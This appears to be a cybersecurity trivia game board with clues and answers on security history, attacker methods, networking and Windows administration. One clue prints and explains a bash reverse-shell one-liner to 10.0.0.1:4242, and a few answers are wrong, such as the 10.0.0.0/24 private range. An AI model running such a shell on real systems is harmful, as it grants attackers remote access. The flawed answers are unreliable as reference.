Security History
Attacker Methodology
If You Dare
Networking for Nerds
Windows for Winners
100

This type of cryptographic attack requires the attacker to have access to both plaintext and its corresponding ciphertext and is often used to deduce encryption keys. This cryptographic attack was part of the way that the Enigma code was cracked in WW2.

What is a known plain-text attack?

100

When a device has been ransomwared or seized for investigation, the device memory should be preserved so that defenders can attempt to extract this information from running memory.

What is the device Encryption Key?

100

What does EACH CHARACTER in this command do?

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

bash -i : interactive bash shell

>& : redirect to standard out/err

/dev/tcp/ : open a TCP connection

10.0.0.1 : destination IP

4242 : destination port

0>&1 : redirect to standard in

100

This is the highest layer of the OSI model, describing the layer that interfaces between users and network applications.

What is the Application layer?

100

This is a container in Active Directory that groups objects (users, computers, printers, etc.) together for administrative purposes.

What is an Organizational Unit?

200

This Israeli surveillance software, allegedly sold to authoritarian regimes, was exposed in 2021 for infecting journalists' and activists' phones. It used a zero-day in iOS.

What is Pegasus, by the NSO group?

200

Considered the counter framework to MITRE ATT&CK, this knowledge graph is a framework of cybersecurity countermeasures.

What is MITRE D3FEND?

200

When this registry key is set, Windows stores clear-text credentials in memory, leaving the device vulnerable to LSASS memory dumping attacks using tools like Mimikatz.

What is WDIGEST?

200

This term refers to the amount of time or “hops” that a packet is set to exist inside a network before being discarded by a router.

What is Time To Live (TTL)?

200

This is a virtual collection of policy settings that define how users and computers within an Active Directory domain behave.

What is a Group Policy Object (GPO)?

300

This adversary group stole and then later publicized the EternalBlue exploit from the Equation Group. The adversary group disappeared shortly after the theft.

Who are the Shadow Brokers?

300

This acronym is used to describe vulnerabilities that are known to be used by adversaries in cyber attacks in the wild.

What are KEV (Known Exploited Vulnerabilities)?

300

What's the plaintext of this ciphertext? PBEERPG

What is CORRECT?

300

This TCP flag is used to terminate a TCP connection. When this TCP flag is received, the receiving endpoint should immediately discard the connection and any related resources. This is typically used to handle errors or abnormal situations where a connection should be closed abruptly.

What is RST?

300

This is Windows' native web server service. This service can be installed on any Windows server to create a website accessible both internally and externally. This service can also be used for FTP.

What is Internet Information Services (IIS)?

400

This APT group is a hacking group mostly made up of teens and young adults believed to live in the United States and the United Kingdom. This group hacked casinos and Snowflake. Two teenagers and two young adults were arrested in 2024 for connections to this APT.

Who is Scattered Spider?

400

This term identifies the last phase of the Lockheed Martin Cyber Kill Chain, in which an attacker carries out their intent during an intrusion campaign. "With 'Hands on Keyboard' access, intruders accomplish their original goals".

What is Actions on Objectives?

400

If someone ran the command "chmod +256 pass.txt", what are the resulting permissions for pass.txt file and who has those permissions?

OWNER - WRITE
GROUP - READ, EXECUTE
EVERYONE ELSE - READ, WRITE

400

These three email protocols are used for how email is retrieved, sent, and stored. Each protocol has a distinct port.

What are SMTP (port 25), IMAP (port 143) and POP3 (port 110)?

400

This token is used in Kerberos Authentication to request access tokens from the Ticket Granting Service (TGS) for specific resources/systems joined to the domain.

What is a Ticket Granting Ticket?

500

This company's Slack instance was breached in July 2024 by a so-called Russian hacktivist group, consequently losing 1.1 TB of data that was later publicized. A recent ruling found that the attacker was not a Russian hacking group but instead a 25-year-old U.S. resident.

What is the Walt Disney Company?

500

This term describes a technique in which attackers modify the opened, modified, and created dates on files in order to mislead incident responders during their investigation.

What is timestomping?

500

What is the plaintext of this ciphertext?

CIPHERTEXT - PBVNGF

ENCRYPTION KEY - ANNANN

The result is POINTS.

500

These three subnets are the standardized Private (local) IPv4 address ranges.

What are 10.0.0.0/24, 192.168.0.0/16, and 172.16.0.0/12?

500

This critical vulnerability is a flaw in the Netlogon Remote Protocol (MS-NRPC) that allows an unauthenticated attacker to impersonate any computer, including the domain controller itself, by sending crafted authentication messages with all-zero values.

What is Zerologon?
